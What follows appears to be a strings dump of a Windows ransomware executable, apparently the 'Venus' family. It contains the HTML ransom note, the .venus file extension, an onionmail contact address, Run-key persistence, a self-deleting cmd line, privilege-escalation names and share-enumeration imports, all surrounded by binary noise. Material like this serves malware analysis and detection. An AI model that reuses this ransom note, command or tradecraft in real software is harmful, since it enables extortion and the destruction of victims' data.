!This program cannot be run in DOS mode.
`.rdata
@.data
ho%m\j
hb|3Zj
hz,,Lj
D$$PVh
1P 1H$_^[
2-byVW
T$d5l>+3T$4
n<3D$$
3T$\RP
3T$@RP
3T$DRP
T$t3D$4
L$h3L$|
T$@3D$x
D$l3D$HPR
L$D3L$x
3D$XPR
T$|3D$x
T$p3T$DRP
3D$DPQ
L$P3L$8
D$L3D$<PQ
T$T3D$X
T$T3T$xRP
T$\3T$h
T$L3D$d
T$@3T$XRP
T$(3T$
T$03T$TRP
T$$3T$PRP
L$X3L$$
T$\3T$xRP
T$|3T$DRP
3T$DRP
3T$4RP
T$03T$`RP
T$$3T$PRP
T$<3T$HRP
T$(3T$
T$03T$TRP
D$p3D$tPQ
3T$DRP
T$03T$`
3D$DPQ
T$P3D$t
T$$3T$|RP
L$`3L$d
D$p3D$XPQ
3T$DRP
D$x3L$|
D$<3D$pPQ
3T$pRP
T$(3T$
L$X3L$L
3D$LPQ
3D$lPQ
T$<3D$|
D$83D$DPQ
3D$LPQ
D$|3D$`PQ
AD9ADw
A(l>+
#D$$#t$
G<_^[]
te k_^
3p 3x03H
3p43H$
?dcsqdcasdxasd=
?dcsqdcasdxasd=
?dcsqdcasdxasd=
text/*
HTTP/1.1
/c ping localhost -n 3 > nul & del %s
C:\Windows\System32\cmd.exe
SHChangeNotify
Shell32.dll
C:\Windows\System32\cmd.exe
<html><head><hta:application ApplicationName="Venus" Border="Thin" BorderStyle="Static" Caption="Yes" ContextMenu="No" MaximizeButton="No" MinimizeButton="No" Navigable="No" Scroll="No" Selection="No" ShowInTaskbar="Yes" SingleInstance="Yes" SysMenu="Yes" WindowState="Maximize"><title>Venus</title><style type = "text/css">*{padding:0;margin:0}p{color:white}.f{background-color:#ff7c00;width:100%;margin-left:auto;margin-right:auto;height:100%}.c h1{color:white;line-height:80px}.r{word-break:break-all;float:left;width:100%;text-align:center}</style></head><body><div class="f"><div class="c"><h1 align="center"><<<Venus>>></h1></div><div class="r"><p></br></br></br></br><strong>We downloaded and encrypted your data.</strong></br>Only we can decrypt your data.<br><strong>IMPORTANT!</strong><br> If you, your programmers or your friends would try to help you to decrypt the files it can cause data loss even after you pay.<br> In this case we will not be able to help you.<br>Do not play with files.</p
<html><head><title>Venus</title><style type = "text/css">*{padding:0;margin:0}p{color:white}.f{background-color:#ff7c00;width:100%;margin-left:auto;margin-right:auto;height:100%}.c h1{color:white;line-height:80px}.r{word-break:break-all;float:left;width:100%;text-align:center}</style></head><body><div class="f"><div class="c"><h1 align="center"><<<Venus>>></h1></div><div class="r"><p></br></br></br></br><strong>We downloaded and encrypted your data.</strong></br>Only we can decrypt your data.<br><strong>IMPORTANT!</strong><br> If you, your programmers or your friends would try to help you to decrypt the files it can cause data loss even after you pay.<br> In this case we will not be able to help you.<br>Do not play with files.</p><p>Do not rename encrypted files.<br>Do not try to decrypt your data using third party software, it may cause permanent data loss.<br>Decryption of your files with the help of third parties may cause increased price or you can become a victim of a scam.</br>-------
</p></div></body></html></html></body></html>
]-wyP
^S5rQ8
5@;>fq
Ib|3Z24y
|\={S}-G6
Vz,,LCp
gooodgamer
pbsecGOOD
secpbGOOD
xXBLTZKmAu9pjcfxrIK4gkDp/J9XXATjuysFRXG4rH4=
pbsecGOOD
3nDfO5MC84yPIVrig9wVSglY/VEutb0apH6dCWdW1Rw=
3nDfO5MC84yPIVrig9wVSglY/VEutb0apH6dCWdW1Rw=
3nDfO5MC84yPIVrig9wVSglY/VEutb0apH6dCWdW1Rw=
3nDfO5MC84yPIVrig9wVSglY/VEutb0apH6dCWdW1Rw=
secpbGOOD
RtlInitUnicodeString
NtCreateFile
NtWriteFile
NtReadFile
NtQueryDirectoryFile
NtOpenFile
NtClose
NtSetInformationFile
NtRemoveIoCompletion
NtSetIoCompletion
NtCreateIoCompletion
NtQuerySystemInformation
NtDll.dll
NtDuplicateObject
NtDll.dll
NtQueryObject
NtDll.dll
SetSecurityInfo
Advapi32.dll
SetEntriesInAclW
Advapi32.dll
RtlZeroMemory
RtlFillMemory
memcpy
D7q/;M
SigEd25519 no Ed25519 collisions
GooGLeeedRRG
?ffffff
.text$mn
.idata$5
.rdata
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
CryptStringToBinaryA
CRYPT32.dll
InitCommonControlsEx
COMCTL32.dll
WNetOpenEnumW
WNetEnumResourceW
WNetCloseEnum
MPR.dll
GetCurrentProcess
WaitForSingleObject
OpenProcess
HeapReAlloc
CloseHandle
GetProcessHeap
lstrcmpW
GetDiskFreeSpaceW
GetDriveTypeW
GetLogicalDriveStringsW
CreateThread
lstrcpyW
lstrlenW
WriteFile
lstrlenA
CreateFileW
GetCurrentThreadId
GetLastError
lstrcatW
GetWindowsDirectoryW
GetSystemTime
lstrcmpiW
WaitForMultipleObjects
ResumeThread
GetVolumeInformationW
VirtualAlloc
GetComputerNameExW
lstrcatA
Process32NextW
Process32FirstW
GetSystemInfo
GetVersionExW
GetModuleHandleA
lstrcpyA
GetProcAddress
ExitProcess
GetModuleHandleW
EnterCriticalSection
LeaveCriticalSection
InitializeCriticalSection
GetVolumePathNameW
MulDiv
GetCommandLineW
FindFirstVolumeW
FindNextVolumeW
FindVolumeClose
GetFileSize
QueryDosDeviceW
ReadFile
GetTempPathW
CreateMutexW
CreateProcessA
Wow64DisableWow64FsRedirection
IsWow64Process
GetModuleFileNameA
GetModuleFileNameW
SetVolumeMountPointW
KERNEL32.dll
wsprintfW
LoadImageW
PostQuitMessage
GetDlgItem
GetClientRect
LoadCursorW
TranslateMessage
RegisterHotKey
SetTimer
DispatchMessageW
ShowWindow
RegisterClassExW
GetSystemMetrics
EndDialog
SendMessageW
CreateWindowExW
MessageBoxW
SetWindowPos
GetWindowRect
DefWindowProcW
GetMessageW
wsprintfA
DrawTextW
ReleaseDC
SystemParametersInfoW
USER32.dll
GetDeviceCaps
CreateFontW
BitBlt
CreateCompatibleBitmap
CreateCompatibleDC
DeleteDC
DeleteObject
GetTextExtentPoint32W
SelectObject
SetBkColor
SetBkMode
SetTextColor
CreateDIBSection
GDI32.dll
RegQueryValueExW
RegOpenKeyExW
RegQueryValueExA
RegCloseKey
AllocateAndInitializeSid
SystemFunction036
RegCreateKeyExW
RegSetValueExW
ADVAPI32.dll
SHEmptyRecycleBinW
SHBrowseForFolderW
SHGetPathFromIDListW
CommandLineToArgvW
ShellExecuteExW
SHELL32.dll
WS2_32.dll
GetAdaptersAddresses
SendARP
IPHLPAPI.DLL
NetShareEnum
NetApiBufferFree
NETAPI32.dll
12210111111610599117115
FRPU\X_
RT\PM\
RVEPYoV
@EXTE
GCFX]\XYTMe
VW]UET
BYPR^GF
SRUTRXD
BTA JQGCBT_EL
qYNXHBxWW
bypuyfszi`
ur}taE1
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
EQBZZX]]
ZBWAeBC^UIT
BAYX^T_CTMe
B@]SC^ABUG
xx BC^BUCGCTIS
B@[FC\tT@
YCQVU\TOT
]RCBUTIT
]SBY\A
BH_RBX]P
xx \KVTCZE^A@^EUM\
PRnEADR
YFHUA]BBBCcWJT
IWEBFVZV_RIT
\IUTBZE^FBUGOPRT
_RPDE^DFUC
aV\FBFRTIT
X^_EDGR
PV_EEGS
e_QAGSTIT
SPKTWXIRZnW[UUIT
ER\K]R^YWXR.TJW
XyBC^U
]LJH]U
\HB@ZU
ZIMTOT
BFSRZrTAWCFXRTTIS
X_W^FPD]
xx \ASRSTBBTIS
^_T_YEU
oDF^^_ZTIT
IVFTEA_A.TJW
B@ZBUGOKTOT
EXTSPE
EY@nUW@SYCUTIT
FXYF^GdWJT
F^DU@T]
./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
internal
sysrandom
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='highestAvailable' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
jjjjjjjj
Cjjjjjj
jjjjjjj
DRIVE_REMOVABLE
DRIVE_FIXED
DRIVE_REMOTE
\??\%.2s\
\??\UNC%s\
\??\%s\
Network
Network share
Network Dir
Network Dir
TSoftware\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
g g g o n e123
g g g o n e123
eC:\Windows\%s.png
.venus
Classes
SOFTWARE
%s\%s\%s
DefaultIcon
All your files has been encrypted
All information how to make decrypt you can find in
README file
Times New Roman
Control Panel\Desktop
Wallpaper
TrustedInstaller
winsta0\default
SeDebugPrivilege
SeImpersonatePrivilege
SeAssignPrimaryTokenPrivilege
SeIncreaseQuotaPrivilege
\cmd.exe
winlogon.exe
TrustedInstaller.exe
Print$
ADMIN$
Default share
\??\UNC\%s\%s\
Remote UNC
Remote UNC
README.html
README.txt
README.html
Tor Browser
Windows
dropbox
iexplorer
%s%x%x%x%x.goodgame
Diff th work
kernel32.dll
SystemDrive
decryptdata@onionmail.org
Nq31Dn87own5ge3wC9PwFimg
Nq31Dn87own5ge3wC9PwFimg
decryptdata@onionmail.org
%s;%s;%s;%s;
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
"OS": "%s",
"CompName": "%s",
"ext": "%s"
"processes":[
svchost.exe
{ "drives":{
\??\%.2s\
"%s\": "%I64d\\%I64dGB"
,"%s\": "%I64d\\%I64dGB"
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
.venus
SeDebugPrivilege
SeTcbPrivilege
SeTakeOwnershipPrivilege
SeSecurityPrivilege
SOFTWARE\Microsoft\Windows\CurrentVersion
ntdll.dll
ntdll.dll
entdll.dll
ntdll.dll
ntdll.dll
ntdll.dll
entdll.dll
ntdll.dll
ntdll.dll
ntdll.dll
ntdll.dll
ntdll.dll
ntdll.dll
ntdll.dll
\??\UNC%s\
\??\%s\
TempWorking
SysListView32
Size done
Done ?
344 TP
Custom
Button
STATIC
Segoe Print